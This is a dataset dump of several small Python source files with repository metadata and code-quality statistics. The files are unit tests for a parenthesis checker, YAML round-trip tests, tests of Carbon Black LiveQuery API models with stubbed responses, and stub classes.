hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
683f23064e53c882ea56bc32523a8b3c20f432b5
| 1,027
|
py
|
Python
|
test_parenthetics.py
|
Jakealope/New-Data-Structures
|
0fa08a880dbf0f618c7c86c8ac318541d9381622
|
[
"MIT"
] | null | null | null |
test_parenthetics.py
|
Jakealope/New-Data-Structures
|
0fa08a880dbf0f618c7c86c8ac318541d9381622
|
[
"MIT"
] | null | null | null |
test_parenthetics.py
|
Jakealope/New-Data-Structures
|
0fa08a880dbf0f618c7c86c8ac318541d9381622
|
[
"MIT"
] | null | null | null |
from parenthetics import is_balanced
import pytest
# These are unit tests for the parenthetics.py file
def test_isone():
assert is_balanced("(") == 1
def test_isneg():
assert is_balanced(")") == -1
def test_iszero():
assert is_balanced("( )") == 0
def test_withstring():
assert is_balanced("this is a (string) with open and close") == 0
def test_mismatched():
assert is_balanced("This is a string with )))))(((((( wrong order") == -1
def test_bug():
assert is_balanced("()(") == 1
def test_greater_than_one():
assert is_balanced("(((") == 1
def test_three():
assert is_balanced("(((this is some text)))some more text") == 0
def test_three_unballanced():
assert is_balanced("(((text))))(") == -1
def test_empty():
assert is_balanced("") == 0
def test_no_paren():
assert is_balanced("this is text no parenthesis") == 0
def test_jumbled_up():
assert is_balanced("(()()))()") == -1
def test_will_it_break():
assert is_balanced("()())(())(())(((") == -1
| 18.339286
| 77
| 0.629017
| 142
| 1,027
| 4.309859
| 0.359155
| 0.228758
| 0.339869
| 0.166667
| 0.454248
| 0.382353
| 0.107843
| 0.107843
| 0
| 0
| 0
| 0.015625
| 0.189873
| 1,027
| 55
| 78
| 18.672727
| 0.719952
| 0.047712
| 0
| 0
| 0
| 0
| 0.199795
| 0
| 0
| 0
| 0
| 0
| 0.464286
| 1
| 0.464286
| true
| 0
| 0.071429
| 0
| 0.535714
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
6873ed48107437fbfdeff3bdadd526cecf36827a
| 8,490
|
py
|
Python
|
tests/test_output.py
|
looztra/kubespl
|
44f336614af806b2ca6e8f0ce2482995fa017f86
|
[
"Apache-2.0"
] | 21
|
2019-07-17T06:50:30.000Z
|
2021-08-31T11:30:37.000Z
|
tests/test_output.py
|
looztra/kubespl
|
44f336614af806b2ca6e8f0ce2482995fa017f86
|
[
"Apache-2.0"
] | 16
|
2019-11-13T19:09:33.000Z
|
2021-05-23T17:05:43.000Z
|
tests/test_output.py
|
looztra/kubesplit
|
44f336614af806b2ca6e8f0ce2482995fa017f86
|
[
"Apache-2.0"
] | null | null | null |
"""Test the output package."""
from io import StringIO
from yamkix.config import get_yamkix_config_from_default
from yamkix.yaml_writer import get_opinionated_yaml_writer
from kubesplit.k8s_descriptor import K8SDescriptor
from kubesplit.output import save_descriptor_to_stream
def test_roundtrip_when_preserve_quotes_true():
"""test_roundtrip_when_preserve_quotes_true."""
s_input = """---
apiVersion: extensions/v1beta1 # with comment
kind: ReplicaSet
metadata:
name: tname
namespace: tns
annotations:
string_no_quotes: frontend
string_single_quotes: 'frontend'
string_double_quotes: "frontend"
boolean_no_quotes: true
boolean_single_quotes: 'true'
boolean_double_quotes: "true"
number_no_quotes: 1
number_single_quotes: '1'
number_double_quotes: "1"
"""
yamkix_config = get_yamkix_config_from_default(quotes_preserved=True)
yaml_instance = get_opinionated_yaml_writer(yamkix_config)
parsed = yaml_instance.load_all(s_input)
for yaml_resource in parsed:
as_yaml = yaml_resource
descriptor = K8SDescriptor(
name="tname", kind="ReplicaSet", namespace="tns", as_yaml=as_yaml
)
output = StringIO()
save_descriptor_to_stream(
descriptor,
output,
yaml_instance=yaml_instance,
yamkix_config=yamkix_config,
)
s_output = output.getvalue()
print("input => [{0}]".format(s_input))
print("output => [{0}]".format(s_output))
assert s_output == s_input
def test_roundtrip_when_preserve_quotes_false():
"""test_roundtrip_when_preserve_quotes_false."""
s_input = """---
apiVersion: extensions/v1beta1 # with comment
kind: ReplicaSet
metadata:
name: tname
namespace: tns
annotations:
string_no_quotes: frontend
string_single_quotes: 'frontend'
string_double_quotes: "frontend"
boolean_no_quotes: true
boolean_single_quotes: 'true'
boolean_double_quotes: "true"
number_no_quotes: 1
number_single_quotes: '1'
number_double_quotes: "1"
"""
s_expected = """---
apiVersion: extensions/v1beta1 # with comment
kind: ReplicaSet
metadata:
name: tname
namespace: tns
annotations:
string_no_quotes: frontend
string_single_quotes: frontend
string_double_quotes: frontend
boolean_no_quotes: true
boolean_single_quotes: 'true'
boolean_double_quotes: 'true'
number_no_quotes: 1
number_single_quotes: '1'
number_double_quotes: '1'
"""
yamkix_config = get_yamkix_config_from_default(quotes_preserved=False)
yaml_instance = get_opinionated_yaml_writer(yamkix_config)
parsed = yaml_instance.load_all(s_input)
for yaml_resource in parsed:
as_yaml = yaml_resource
descriptor = K8SDescriptor(
name="tname", kind="ReplicaSet", namespace="tns", as_yaml=as_yaml
)
output = StringIO()
save_descriptor_to_stream(
descriptor, output, yaml_instance, yamkix_config=yamkix_config
)
s_output = output.getvalue()
print("input => [{0}]".format(s_input))
print("expected => [{0}]".format(s_expected))
print("output => [{0}]".format(s_output))
assert s_output == s_expected
def test_roundtrip_when_dash_inwards_false():
"""test_roundtrip_when_dash_inwards_false."""
s_input = """---
apiVersion: v1 # with comment
kind: Pod
metadata:
name: yan_solo
namespace: tatouine
spec:
containers:
- name : first
image: nginx
ports:
- name: http
port: 80
- name: https
port: 443
"""
s_expected = """---
apiVersion: v1 # with comment
kind: Pod
metadata:
name: yan_solo
namespace: tatouine
spec:
containers:
- name: first
image: nginx
ports:
- name: http
port: 80
- name: https
port: 443
"""
yamkix_config = get_yamkix_config_from_default(dash_inwards=False)
yaml_instance = get_opinionated_yaml_writer(yamkix_config)
parsed = yaml_instance.load_all(s_input)
for yaml_resource in parsed:
as_yaml = yaml_resource
descriptor = K8SDescriptor(
name="tname", kind="ReplicaSet", namespace="tns", as_yaml=as_yaml
)
output = StringIO()
save_descriptor_to_stream(
descriptor, output, yaml_instance, yamkix_config=yamkix_config
)
s_output = output.getvalue()
print("input => [{0}]".format(s_input))
print("expected => [{0}]".format(s_expected))
print("output => [{0}]".format(s_output))
assert s_output == s_expected
def test_roundtrip_when_dash_inwards_true():
"""test_roundtrip_when_dash_inwards_true."""
s_input = """---
apiVersion: v1 # with comment
kind: Pod
metadata:
name: yan_solo
namespace: tatouine
spec:
containers:
- name : first
image: nginx
ports:
- name: http
port: 80
- name: https
port: 443
"""
s_expected = """---
apiVersion: v1 # with comment
kind: Pod
metadata:
name: yan_solo
namespace: tatouine
spec:
containers:
- name: first
image: nginx
ports:
- name: http
port: 80
- name: https
port: 443
"""
yamkix_config = get_yamkix_config_from_default(dash_inwards=True)
yaml_instance = get_opinionated_yaml_writer(yamkix_config)
parsed = yaml_instance.load_all(s_input)
for yaml_resource in parsed:
as_yaml = yaml_resource
descriptor = K8SDescriptor(
name="tname", kind="ReplicaSet", namespace="tns", as_yaml=as_yaml
)
output = StringIO()
save_descriptor_to_stream(
descriptor, output, yaml_instance, yamkix_config=yamkix_config
)
s_output = output.getvalue()
print("input => [{0}]".format(s_input))
print("expected => [{0}]".format(s_expected))
print("output => [{0}]".format(s_output))
assert s_output == s_expected
def test_roundtrip_with_unconsistent_comments():
"""test_roundtrip_with_unconsistent_comments.
Comments badly placed should be pushed to 1 char after content
"""
s_input = """---
apiVersion: v1 # with comment
kind: Pod
metadata:
name: yan_solo
namespace: tatouine
spec:
containers:
- name : first
image: nginx
ports:
- name: http
port: 80
- name: https
port: 443
"""
s_expected = """---
apiVersion: v1 # with comment
kind: Pod
metadata:
name: yan_solo
namespace: tatouine
spec:
containers:
- name: first
image: nginx
ports:
- name: http
port: 80
- name: https
port: 443
"""
yamkix_config = get_yamkix_config_from_default(spaces_before_comment=1)
yaml_instance = get_opinionated_yaml_writer(yamkix_config)
parsed = yaml_instance.load_all(s_input)
for yaml_resource in parsed:
as_yaml = yaml_resource
descriptor = K8SDescriptor(
name="tname", kind="ReplicaSet", namespace="tns", as_yaml=as_yaml
)
output = StringIO()
save_descriptor_to_stream(
descriptor, output, yaml_instance, yamkix_config=yamkix_config
)
s_output = output.getvalue()
print("input => [{0}]".format(s_input))
print("expected => [{0}]".format(s_expected))
print("output => [{0}]".format(s_output))
assert s_output == s_expected
def test_roundtrip_with_weird_comments_config():
"""test_roundtrip_with_weird_comments_config."""
s_input = """---
apiVersion: v1 # with comment
kind: Pod
metadata:
name: yan_solo
namespace: tatouine
spec:
containers:
- name : first
image: nginx
ports:
- name: http
port: 80
- name: https
port: 443
"""
s_expected = """---
apiVersion: v1 # with comment
kind: Pod
metadata:
name: yan_solo
namespace: tatouine
spec:
containers:
- name: first
image: nginx
ports:
- name: http
port: 80
- name: https
port: 443
"""
yamkix_config = get_yamkix_config_from_default(spaces_before_comment=7)
yaml_instance = get_opinionated_yaml_writer(yamkix_config)
parsed = yaml_instance.load_all(s_input)
for yaml_resource in parsed:
as_yaml = yaml_resource
descriptor = K8SDescriptor(
name="tname", kind="ReplicaSet", namespace="tns", as_yaml=as_yaml
)
output = StringIO()
save_descriptor_to_stream(
descriptor, output, yaml_instance, yamkix_config=yamkix_config
)
s_output = output.getvalue()
print("input => [{0}]".format(s_input))
print("expected => [{0}]".format(s_expected))
print("output => [{0}]".format(s_output))
assert s_output == s_expected
| 26.61442
| 75
| 0.678445
| 1,032
| 8,490
| 5.260659
| 0.09593
| 0.070731
| 0.025051
| 0.033892
| 0.949899
| 0.93461
| 0.883588
| 0.883588
| 0.883588
| 0.883588
| 0
| 0.013674
| 0.216137
| 8,490
| 318
| 76
| 26.698113
| 0.802104
| 0.039812
| 0
| 0.870748
| 0
| 0
| 0.429135
| 0.047366
| 0
| 0
| 0
| 0
| 0.020408
| 1
| 0.020408
| false
| 0
| 0.017007
| 0
| 0.037415
| 0.057823
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cc1524e2bfec6dc9fbde7d8ad0fb040fb88220e3
| 151
|
py
|
Python
|
util/test/report/__init__.py
|
henriquesimoes/humpback
|
ba687a71f95ef9c9c30426eefae11a69efd6f942
|
[
"BSD-3-Clause"
] | null | null | null |
util/test/report/__init__.py
|
henriquesimoes/humpback
|
ba687a71f95ef9c9c30426eefae11a69efd6f942
|
[
"BSD-3-Clause"
] | null | null | null |
util/test/report/__init__.py
|
henriquesimoes/humpback
|
ba687a71f95ef9c9c30426eefae11a69efd6f942
|
[
"BSD-3-Clause"
] | null | null | null |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from .report import ReportManager, Report
| 30.2
| 41
| 0.874172
| 19
| 151
| 6.210526
| 0.473684
| 0.254237
| 0.40678
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.112583
| 151
| 5
| 41
| 30.2
| 0.880597
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0.25
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
cc227c2e44657430d5cdb9fc5e743ffd2eb9ee38
| 10,779
|
py
|
Python
|
test/cbapi/psc/livequery/test_models.py
|
mtmcgrew/cbapi-python
|
6e81507ff30a57eb1f13ae829c28e6ee339d2ad1
|
[
"MIT"
] | null | null | null |
test/cbapi/psc/livequery/test_models.py
|
mtmcgrew/cbapi-python
|
6e81507ff30a57eb1f13ae829c28e6ee339d2ad1
|
[
"MIT"
] | 1
|
2021-03-31T19:51:07.000Z
|
2021-03-31T19:51:07.000Z
|
test/cbapi/psc/livequery/test_models.py
|
deepakmishraapi/cbresponse
|
420fa05d0f7b9d61e5682d7a69a4098f6c32e61c
|
[
"MIT"
] | null | null | null |
import pytest
from cbapi.psc.livequery.rest_api import CbLiveQueryAPI
from cbapi.psc.livequery.models import Run, Result
from cbapi.psc.livequery.query import ResultQuery, FacetQuery
from cbapi.errors import ApiError
from test.cbtest import StubResponse, patch_cbapi
def test_run_refresh(monkeypatch):
_was_called = False
def _get_run(url, parms=None, default=None):
nonlocal _was_called
assert url == "/livequery/v1/orgs/Z100/runs/abcdefg"
_was_called = True
return {"org_key": "Z100", "name": "FoobieBletch", "id": "abcdefg", "status": "COMPLETE"}
api = CbLiveQueryAPI(url="https://example.com", token="ABCD/1234", org_key="Z100", ssl_verify=True)
patch_cbapi(monkeypatch, api, GET=_get_run)
run = Run(api, "abcdefg", {"org_key": "Z100", "name": "FoobieBletch", "id": "abcdefg", "status": "ACTIVE"})
rc = run.refresh()
assert _was_called
assert rc
assert run.org_key == "Z100"
assert run.name == "FoobieBletch"
assert run.id == "abcdefg"
assert run.status == "COMPLETE"
def test_run_stop(monkeypatch):
_was_called = False
def _execute_stop(url, body, **kwargs):
nonlocal _was_called
assert url == "/livequery/v1/orgs/Z100/runs/abcdefg/status"
assert body == {"status": "CANCELLED"}
_was_called = True
return StubResponse({"org_key": "Z100", "name": "FoobieBletch", "id": "abcdefg", "status": "CANCELLED"})
api = CbLiveQueryAPI(url="https://example.com", token="ABCD/1234", org_key="Z100", ssl_verify=True)
patch_cbapi(monkeypatch, api, PUT=_execute_stop)
run = Run(api, "abcdefg", {"org_key": "Z100", "name": "FoobieBletch", "id": "abcdefg", "status": "ACTIVE"})
rc = run.stop()
assert _was_called
assert rc
assert run.org_key == "Z100"
assert run.name == "FoobieBletch"
assert run.id == "abcdefg"
assert run.status == "CANCELLED"
def test_run_stop_failed(monkeypatch):
_was_called = False
def _execute_stop(url, body, **kwargs):
nonlocal _was_called
assert url == "/livequery/v1/orgs/Z100/runs/abcdefg/status"
assert body == {"status": "CANCELLED"}
_was_called = True
return StubResponse({"error_message": "The query is not presently running."}, 409)
api = CbLiveQueryAPI(url="https://example.com", token="ABCD/1234", org_key="Z100", ssl_verify=True)
patch_cbapi(monkeypatch, api, PUT=_execute_stop)
run = Run(api, "abcdefg", {"org_key": "Z100", "name": "FoobieBletch", "id": "abcdefg", "status": "CANCELLED"})
rc = run.stop()
assert _was_called
assert not rc
def test_run_delete(monkeypatch):
_was_called = False
def _execute_delete(url):
nonlocal _was_called
assert url == "/livequery/v1/orgs/Z100/runs/abcdefg"
if _was_called:
pytest.fail("_execute_delete should not be called twice!")
_was_called = True
return StubResponse(None)
api = CbLiveQueryAPI(url="https://example.com", token="ABCD/1234", org_key="Z100", ssl_verify=True)
patch_cbapi(monkeypatch, api, DELETE=_execute_delete)
run = Run(api, "abcdefg", {"org_key": "Z100", "name": "FoobieBletch", "id": "abcdefg", "status": "ACTIVE"})
rc = run.delete()
assert _was_called
assert rc
assert run._is_deleted
# Now ensure that certain operations that don't make sense on a deleted object raise ApiError
with pytest.raises(ApiError):
run.refresh()
with pytest.raises(ApiError):
run.stop()
# And make sure that deleting a deleted object returns True immediately
rc = run.delete()
assert rc
def test_run_delete_failed(monkeypatch):
_was_called = False
def _execute_delete(url):
nonlocal _was_called
assert url == "/livequery/v1/orgs/Z100/runs/abcdefg"
_was_called = True
return StubResponse(None, 403)
api = CbLiveQueryAPI(url="https://example.com", token="ABCD/1234", org_key="Z100", ssl_verify=True)
patch_cbapi(monkeypatch, api, DELETE=_execute_delete)
run = Run(api, "abcdefg", {"org_key": "Z100", "name": "FoobieBletch", "id": "abcdefg", "status": "ACTIVE"})
rc = run.delete()
assert _was_called
assert not rc
assert not run._is_deleted
def test_result_device_summaries(monkeypatch):
_was_called = False
def _run_summaries(url, body, **kwargs):
nonlocal _was_called
assert url == "/livequery/v1/orgs/Z100/runs/abcdefg/results/device_summaries/_search"
assert body == {"query": "foo", "criteria": {"device_name": ["AxCx", "A7X"]},
"sort": [{"field": "device_name", "order": "ASC"}], "start": 0}
_was_called = True
return StubResponse({"org_key": "Z100", "num_found": 2,
"results": [{"id": "ghijklm", "total_results": 2, "device_id": 314159,
"metrics": [{"key": "aaa", "value": 0.0}, {"key": "bbb", "value": 0.0}]},
{"id": "mnopqrs", "total_results": 3, "device_id": 271828,
"metrics": [{"key": "aaa", "value": 0.0}, {"key": "bbb", "value": 0.0}]}]})
api = CbLiveQueryAPI(url="https://example.com", token="ABCD/1234", org_key="Z100", ssl_verify=True)
patch_cbapi(monkeypatch, api, POST=_run_summaries)
result = Result(api, {"id": "abcdefg", "device": {"id": "abcdefg"}, "fields": {}, "metrics": {}})
query = result.query_device_summaries().where("foo").criteria(device_name=["AxCx", "A7X"]).sort_by("device_name")
assert isinstance(query, ResultQuery)
count = 0
for item in query.all():
if item.id == "ghijklm":
assert item.total_results == 2
assert item.device_id == 314159
elif item.id == "mnopqrs":
assert item.total_results == 3
assert item.device_id == 271828
else:
pytest.fail("Invalid object with ID %s seen" % item.id)
count = count + 1
assert _was_called
assert count == 2
def test_result_query_result_facets(monkeypatch):
_was_called = False
def _run_facets(url, body, **kwargs):
nonlocal _was_called
assert url == "/livequery/v1/orgs/Z100/runs/abcdefg/results/_facet"
assert body == {"query": "xyzzy", "criteria": {"device_name": ["AxCx", "A7X"]},
"terms": {"fields": ["alpha", "bravo", "charlie"]}}
_was_called = True
return StubResponse({"terms": [{"field": "alpha", "values": [{"total": 1, "id": "alpha1", "name": "alpha1"},
{"total": 2, "id": "alpha2", "name": "alpha2"}]},
{"field": "bravo", "values": [{"total": 1, "id": "bravo1", "name": "bravo1"},
{"total": 2, "id": "bravo2", "name": "bravo2"}]},
{"field": "charlie", "values": [{"total": 1, "id": "charlie1",
"name": "charlie1"},
{"total": 2, "id": "charlie2",
"name": "charlie2"}]}]})
api = CbLiveQueryAPI(url="https://example.com", token="ABCD/1234", org_key="Z100", ssl_verify=True)
patch_cbapi(monkeypatch, api, POST=_run_facets)
result = Result(api, {"id": "abcdefg", "device": {"id": "abcdefg"}, "fields": {}, "metrics": {}})
query = result.query_result_facets().where("xyzzy").facet_field("alpha").facet_field(["bravo", "charlie"]) \
.criteria(device_name=["AxCx", "A7X"])
assert isinstance(query, FacetQuery)
count = 0
for item in query.all():
vals = item.values
if item.field == "alpha":
assert vals[0]["id"] == "alpha1"
assert vals[1]["id"] == "alpha2"
elif item.field == "bravo":
assert vals[0]["id"] == "bravo1"
assert vals[1]["id"] == "bravo2"
elif item.field == "charlie":
assert vals[0]["id"] == "charlie1"
assert vals[1]["id"] == "charlie2"
else:
pytest.fail("Unknown field name %s seen" % item.field)
count = count + 1
assert _was_called
assert count == 3
def test_result_query_device_summary_facets(monkeypatch):
_was_called = False
def _run_facets(url, body, **kwargs):
nonlocal _was_called
assert url == "/livequery/v1/orgs/Z100/runs/abcdefg/results/device_summaries/_facet"
assert body == {"query": "xyzzy", "criteria": {"device_name": ["AxCx", "A7X"]},
"terms": {"fields": ["alpha", "bravo", "charlie"]}}
_was_called = True
return StubResponse({"terms": [{"field": "alpha", "values": [{"total": 1, "id": "alpha1", "name": "alpha1"},
{"total": 2, "id": "alpha2", "name": "alpha2"}]},
{"field": "bravo", "values": [{"total": 1, "id": "bravo1", "name": "bravo1"},
{"total": 2, "id": "bravo2", "name": "bravo2"}]},
{"field": "charlie", "values": [{"total": 1, "id": "charlie1",
"name": "charlie1"},
{"total": 2, "id": "charlie2",
"name": "charlie2"}]}]})
api = CbLiveQueryAPI(url="https://example.com", token="ABCD/1234", org_key="Z100", ssl_verify=True)
patch_cbapi(monkeypatch, api, POST=_run_facets)
result = Result(api, {"id": "abcdefg", "device": {"id": "abcdefg"}, "fields": {}, "metrics": {}})
query = result.query_device_summary_facets().where("xyzzy").facet_field("alpha") \
.facet_field(["bravo", "charlie"]).criteria(device_name=["AxCx", "A7X"])
assert isinstance(query, FacetQuery)
count = 0
for item in query.all():
vals = item.values
if item.field == "alpha":
assert vals[0]["id"] == "alpha1"
assert vals[1]["id"] == "alpha2"
elif item.field == "bravo":
assert vals[0]["id"] == "bravo1"
assert vals[1]["id"] == "bravo2"
elif item.field == "charlie":
assert vals[0]["id"] == "charlie1"
assert vals[1]["id"] == "charlie2"
else:
pytest.fail("Unknown field name %s seen" % item.field)
count = count + 1
assert _was_called
assert count == 3
| 45.868085
| 118
| 0.554875
| 1,191
| 10,779
| 4.854744
| 0.135181
| 0.051366
| 0.031131
| 0.03459
| 0.812003
| 0.786579
| 0.770668
| 0.745763
| 0.725182
| 0.714978
| 0
| 0.030696
| 0.2837
| 10,779
| 234
| 119
| 46.064103
| 0.718171
| 0.014936
| 0
| 0.715
| 0
| 0
| 0.223175
| 0.035987
| 0
| 0
| 0
| 0
| 0.295
| 1
| 0.08
| false
| 0
| 0.03
| 0
| 0.15
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0bd51f57f44bae5f607d86154168f449e1fd52f3
| 762
|
py
|
Python
|
lfd/environment/robot_world.py
|
def670/lfd
|
9fef15f556cba49dd4b42c0c29505a4137f95fc5
|
[
"BSD-2-Clause"
] | 36
|
2015-05-22T14:47:18.000Z
|
2021-07-27T15:30:36.000Z
|
lfd/environment/robot_world.py
|
jeffmahler/lfd
|
ecc6b934db098c0b1af9946454917b6dc911cb74
|
[
"BSD-2-Clause"
] | null | null | null |
lfd/environment/robot_world.py
|
jeffmahler/lfd
|
ecc6b934db098c0b1af9946454917b6dc911cb74
|
[
"BSD-2-Clause"
] | 13
|
2015-05-22T15:38:07.000Z
|
2021-07-28T03:20:35.000Z
|
from __future__ import division
class RobotWorld(object):
def __init__(self):
raise NotImplementedError
def observe_cloud(self):
raise NotImplementedError
def open_gripper(self):
raise NotImplementedError
def close_gripper(self):
raise NotImplementedError
def execute_trajectory(self):
raise NotImplementedError
class RealRobotWorld(RobotWorld):
def __init__(self):
raise NotImplementedError
def observe_cloud(self):
raise NotImplementedError
def open_gripper(self):
raise NotImplementedError
def close_gripper(self):
raise NotImplementedError
def execute_trajectory(self):
raise NotImplementedError
| 22.411765
| 33
| 0.677165
| 68
| 762
| 7.294118
| 0.294118
| 0.181452
| 0.564516
| 0.5
| 0.850806
| 0.850806
| 0.850806
| 0.850806
| 0.850806
| 0.850806
| 0
| 0
| 0.275591
| 762
| 33
| 34
| 23.090909
| 0.898551
| 0
| 0
| 0.869565
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.434783
| false
| 0
| 0.043478
| 0
| 0.565217
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 11
|
f0fbfdbf43c412792303539c3d091977f426df23
| 105
|
py
|
Python
|
refactorings/move_class.py
|
armingh2000/CodART
|
4a097ef97a927553dcecddeca757c52e2c834db6
|
[
"MIT"
] | null | null | null |
refactorings/move_class.py
|
armingh2000/CodART
|
4a097ef97a927553dcecddeca757c52e2c834db6
|
[
"MIT"
] | null | null | null |
refactorings/move_class.py
|
armingh2000/CodART
|
4a097ef97a927553dcecddeca757c52e2c834db6
|
[
"MIT"
] | 1
|
2021-01-30T09:28:54.000Z
|
2021-01-30T09:28:54.000Z
|
from gen.java9 import Java9_v2Listener
class MoveClassRefactoringListener(Java9_v2Listener):
pass
| 15
| 53
| 0.828571
| 11
| 105
| 7.727273
| 0.727273
| 0.352941
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.054945
| 0.133333
| 105
| 6
| 54
| 17.5
| 0.879121
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
